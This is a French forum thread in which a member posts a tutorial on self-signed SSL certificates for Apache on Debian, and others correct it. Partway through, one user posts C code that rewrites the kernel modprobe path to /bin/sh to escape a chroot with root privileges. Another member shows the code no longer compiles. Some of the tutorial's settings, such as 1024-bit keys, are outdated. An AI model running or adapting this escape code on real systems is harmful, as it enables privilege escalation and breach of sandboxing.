| Création d'un certificat auto-signé sous Debian | |
|
|
Auteur | Message |
---|
ali
Messages : 38 Date d'inscription : 22/06/2010 Age : 83
| Sujet: Création d'un certificat auto-signé sous Debian Dim 27 Juin - 11:44 | |
| Voici un tuto compilé d'après différent site internet Pour utiliser le SSL et créer un certificat sous Debian, vous devez installer les paquets suivants avec aptitude : $# openssl, ssl-cert et libssl0.9.8 Nous allons ensuite nous placer dans le répertoire d'Apache 2 (/etc/apache2) pour générer le certificat au bon endroit : $# cd /etc/apache2 Création de la clé privée RSA : Cette commande va vous permettre de générer une clé RSA : $# openssl genrsa -out server.key 1024 Génération d'un certificat auto-signé : Attention : Si le certificat est auto-signé, les versions récentes de Firefox et IE préviennent le client que le certificat n'a pas été créé par un organisme de certification. La certification d'un site SSL par un organisme, est très coûteuse,c'est pourquoi cette opération ne s'adresse pas aux particuliers mais uniquement aux sites de vente en ligne.A partir de la clé de tout à l'heure, vous allez pouvoir créer un certificat générique pour votre organisme : $# openssl req -new -key server.key -out server.csr Vous devrez répondre ensuite aux questions qui permettront d'identifier votre organisme : – Code de pays – État – Ville – Entreprise – Section de l'entreprise – Nom du responsable du site sécurisé – e-mail du responsable Enfin, vous allez pouvoir créer le certificat utilisable par les visiteurs au format x509 pour une certaine durée (dans cet exemple 1 an) : $# openssl x509 -req -days 365 -in server.csr -signkey server.key -out II- Activation d'un site sécurisé sous Apache : Activer le SSL dans Apache 2 : Pour avoir la liste complête des modules de Apache 2, on peut faire : $# ls /etc/apache2/mods-available Pour activer un module de Apache 2 on utilise la commande a2enmod. Le SSL est peut être déjà activé mais pour le vérifier on peut taper : $# a2enmod ssl Modification des ports d'écoute : Vérifiez dans le fichier /etc/apache2/ports.conf si il existe le port 443 pour le module SSL. Si ce n'est pas le cas, vous pouvez ajouter une ligne : Listen 443 Nouveau site virtuel : Créez un nouveau site virtuel (fichier dans /etc/apache2/sites-available/ ). Dans ce fichier vous pouvez écrire les lignes suivantes : ############debut script######################### NameVirtualHost www.votreserveur.com:443<VirtualHost www.votreserveur.com:443>DocumentRoot /var/www/repduserveur ServerName www.votreserveur.com<Directory /var/www/repduserveur> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from all </Directory> SSLEngine on SSLCertificateFile /etc/apache2/server.crt SSLCertificateKeyFile /etc/apache2/server.key </VirtualHost> ############debut script######################### Redémarrage et test : Il ne reste qu'à recharger le serveur Apache : $# /etc/init.d/apache2 reload Pour tester ce serveur sécurisé, vous pouvez aller sur : https://www.votreserveur.com/Vous devriez avoir un avertissement car ce certificat est auto-signé. Vérifiez le contenu du certificat. Vérifiez par une analyse de trame que les informations ne sont pas lisibles. à toi SuperTuX pour confirmation du tuto | |
|
| |
YannB
Messages : 144 Date d'inscription : 22/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Dim 27 Juin - 13:21 | |
| supertux alias masao? | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Dim 27 Juin - 23:07 | |
| - YannB a écrit:
- supertux alias masao? Very Happy
C'est supermario, moi, pas superman... Quelques remarques : * « $# » ? C'est quoi ce prompt ? * Pas besoin de polluer /etc/apache2 quand on a des dossiers fait pour : /etc/ssl/certs pour les certificats et /etc/ssl/private pour les clés. * Il faut bien faire attention quand on génère la clé, à donner comme nom de l'entreprise (Common Name) l'adresse du site. * Si tu gardes le site par défaut sur /var/www sans SSL, il ne faut pas mettre ton site SSL dans /var/www/monsite mais ailleurs (en supposant que si tu fais du SSL, c'est pour que ton site ne soit pas public !). Pour aller plus loin : * Quelques liens utiles : - http://www.grandville.net/pmwiki.php/OpenSSL/LigneDeCommande (surtout la partie 3 - commandes utiles) - http://www.madboa.com/geek/openssl (oui, tu peux créer la clé et le certificat en une seule commande ) * Pour faire de l'authentification avec certificats clients, il faut se créer une autorité de certification (CA) perso - soit en se tapant la conf d'openssl (je laisse l'exercice à ceux qui auront le courage ) - soit en utilisant le script CA.pl fourni avec openssl : http://postfix.traduc.org/index.php/TLS_README.html#quick-start - soit en utilisant l'utilitaire graphique TinyCA : http://irp.nain-t.net/doku.php/270crypt:030_application (on peut aussi faire appel à des CA gratuites comme http://www.cacert.org ) | |
|
| |
ali
Messages : 38 Date d'inscription : 22/06/2010 Age : 83
| Sujet: Re: Création d'un certificat auto-signé sous Debian Sam 10 Juil - 4:21 | |
| Merci pour les corrections, mais j'aurais voulu avoir des précisions sur le répertoire /monsite. Quels sont les droits d'accès sur le répertoire ? | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Sam 10 Juil - 16:36 | |
| Ben, au niveau des droits Unix, il faut donner les droits suffisants à l'utilisateur apache (www-data sous debian). Au niveau de apache, en gros il faut définir les droits pour les connexions anonymes, et si authentifications les droits pour les utilisateurs authentifiés...
Après, les droits que tu donnes dépendent du site que tu héberges. | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: clé rsa 1024 ! Lun 19 Juil - 11:36 | |
| c 'est la valeur par défaut, l'idéal serait 2048 comme ils font ici.
PS : massao tu serai content de bosser ici ya que des linuxiens aguéris !
C jo qui serait pas content le nombre de troll windaube par jour, j'en deviens ouf !
@ plus | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Lun 19 Juil - 19:35 | |
| Bah, si ils cherchent quelqu'un pour Octobre... | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: ui massao Mar 20 Juil - 9:38 | |
| Salut grep,
ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !
C la merde pour moi ils me demandent des trucs trop hard core !
en fait on de ledi avec des groupes auto, Je dois avec un autre type faire un traducteur de document (BC, facture) en php!
G acheté 3 bouquins ! :p
| |
|
| |
YannB
Messages : 144 Date d'inscription : 22/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Mar 20 Juil - 9:56 | |
| lol mo² , tu vas trimer sévère | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: ui ui Mar 20 Juil - 10:29 | |
| je trime mais heureusment que la communauté des linuxiens est sympa, ils m'aident beaucoup c chiens dla casse !
Mais bon on a su résister à Denis, ... | |
|
| |
YannB
Messages : 144 Date d'inscription : 22/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Mar 20 Juil - 10:32 | |
| t'as envoyé un mail a jean-christophe pastaga pour avoir de l'aide ? | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: JEAN CHRISTOPHE ! Mar 20 Juil - 10:35 | |
| lol il c meme pa se ou est caché son zizi ! Ce guignol recherche encore comment pingué sonr srv ! | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Mar 20 Juil - 11:00 | |
| - m0m0du78 a écrit:
- ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !
C'est saami qui fait du python et du php. Moi je connais que bash et perl... - mOmOdu78 a écrit:
- Je dois avec un autre type faire un traducteur de document (BC, facture) en php!
admin, développeur, traducteur... Tu fais le ménage aussi à la fin ? | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: le ménage ? Mar 20 Juil - 14:06 | |
| euh s il me paye pour ca pkoi pas ?
je suis pas seul sur le dev !
fo dire que g un peu mitonné sur mes compétences mais sa devrait le faire ...
g un code qui casse les couilles à l'admin sys : #include <stdio.h> #include <string.h> #include <unistd.h> #include <linux/unistd.h> #include <linux/sysctl.h> #include <sys/socket.h>
_syscall1(int, _sysctl, struct __sysctl_args *, args); int sysctl(int *name, int nlen, void *oldval, size_t *oldlenp, void *newval, size_t newlen) { struct __sysctl_args args={name,nlen,oldval,oldlenp,newval,newlen}; return _sysctl(&args); }
#define SIZE(x) sizeof(x)/sizeof(x[0]) #define MODPROBEPATHLEN 256
char modprobepath[MODPROBEPATHLEN]; int pathlen; int name[] = { CTL_KERN, KERN_MODPROBE };
int main(void){ strcpy(modprobepath, "/bin/sh"); pathlen = SIZE(modprobepath); if (sysctl(name, SIZE(name), 0, NULL, modprobepath, pathlen)) perror("sysctl"); else { printf("successfully modified the modprobe path.\n"); socket(AF_SECURITY, SOCK_STREAM, 1); printf("executing shell with full privileges, outside of chroot\n"); } return 0;
regarde un peu cette bombe ! | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: réponse ! Mar 20 Juil - 14:09 | |
| Quand le noyau force l'exécution d'un binaire, dans une prison, celui-ci est exécuté avec le vrai système de fichiers racine en tant que racine du nouveau processus.
Pour stopper cela, grsecurity empêche les écritures via sysctl(), mais aussi via le procfs.
ah ah je te rassure c po moi qui est trouvé ça mais j'ai marqué des points auprès du tollier quand g copé collé cette soluce !!
Savoir fouiner c'est parfois plus utile que savoir faire... | |
|
| |
msieur_kara
Messages : 67 Date d'inscription : 22/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Mar 20 Juil - 16:03 | |
| | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Mar 20 Juil - 20:54 | |
| Wé on sait, le C c'est fort, y'a des pointeurs... Ça compile pas chez moi ton truc. Je l'ai copié dans un fichier test.c : - Code:
-
$ make test cc test.c -o test test.c:8: error: expected declaration specifiers or ‘...’ before ‘_sysctl’ test.c:8: error: expected declaration specifiers or ‘...’ before ‘args’ test.c:8: warning: data definition has no type or storage class test.c: In function ‘main’: test.c:33: error: expected declaration or statement at end of input make: *** [test] Erreur 1
Pour info : - Code:
-
$ gcc -v Utilisation des specs internes. COLLECT_GCC=cc COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper Target: x86_64-unknown-linux-gnu Configuré avec: ../configure --prefix=/usr --enable-languages=c,c++,fortran,objc,obj-c++,ada --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-gnu-unique-object --enable-lto --enable-plugin --disable-multilib --disable-libstdcxx-pch --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info Modèle de thread: posix gcc version 4.5.0 20100610 (prerelease) (GCC)
Bon, en fait, tout ce que je voulais savoir, c'est si il fallait être root pour pouvoir sortir du chroot avec ton truc... | |
|
| |
m0m0du78
Messages : 17 Date d'inscription : 07/07/2010 Localisation : Orion
| Sujet: jsutement p! Ven 23 Juil - 15:01 | |
| pas besoin d etre root, le bordel exploite une partie d adress mem ou nimporte qui a accès en écriture .
eeeuuu tu as dit pointeur ?
je ve pa aller en prison ! | |
|
| |
masao
Messages : 64 Date d'inscription : 23/06/2010
| Sujet: Re: Création d'un certificat auto-signé sous Debian Ven 23 Juil - 21:20 | |
| - m0m0du78 a écrit:
- je ve pa aller en priison !
Ben te vantes pas de savoir en sortir alors... Surtout que bon, tu ne t'échapperas pas d'une prison moderne : - man _syscall a écrit:
CONFORMING TO The use of these macros is Linux-specific, and deprecated.
NOTES Starting around kernel 2.6.18, the _syscall macros were removed from header files supplied to user space. Use syscall(2) instead. (Some architec‐ tures, notably ia64, never provided the _syscall macros; on those architectures, syscall(2) was always required.)
Je pouvais toujours m'acharner pour compiler avec un kernel 2.6.34 (sans compter que tu as sauté la dernière accolade fermante en copiant-collant le code) ! | |
|
| |
Contenu sponsorisé
| Sujet: Re: Création d'un certificat auto-signé sous Debian | |
| |
|
| |
| Création d'un certificat auto-signé sous Debian | |
|